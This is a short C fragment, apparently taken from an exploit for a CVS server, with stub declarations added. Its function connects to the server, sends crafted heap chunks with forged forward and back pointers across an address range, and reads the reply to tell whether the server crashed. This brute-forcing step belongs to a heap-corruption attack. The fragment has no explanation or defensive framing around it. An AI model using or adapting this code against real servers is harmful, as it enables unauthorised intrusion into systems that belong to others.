
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CVS_ERROR ;
 int CVS_ERROR2 ;
 int CVS_FLUSH ;
 int CVS_OK ;
 int CVS_UNKNOW ;
 int DUMMY_ADDR ;
 int SET_BK (int) ;
 int SET_FD (int) ;
 int bad_addr (int ) ;
 int build_chunk (int,int,int ) ;
 int cur_num ;
 int cvs_conn () ;
 char* flush_sock () ;
 int memcpy_flush () ;
 int nclose () ;
 int nprintf (int ) ;
 int sleep (int) ;
 scalar_t__ strstr (char*,int ) ;

int range_crashed(int addr, int addr2)
{
    char * buf;

    cvs_conn();
    nprintf(build_chunk(DUMMY_ADDR, DUMMY_ADDR, cur_num++));
    for (; addr < addr2; addr += 8)
        if (!bad_addr(SET_FD(addr)) && !bad_addr(SET_BK(addr + 4)))
            nprintf(build_chunk(addr, addr + 4, cur_num++));
    memcpy_flush();
    nprintf(CVS_FLUSH);
    buf = flush_sock();
    if (strstr(buf, CVS_OK) || strstr(buf, CVS_UNKNOW)
        || strstr(buf, CVS_ERROR) || strstr(buf, CVS_ERROR2))
        {
            nclose();
            return (0);
        }



    nclose();
    return (1);
}
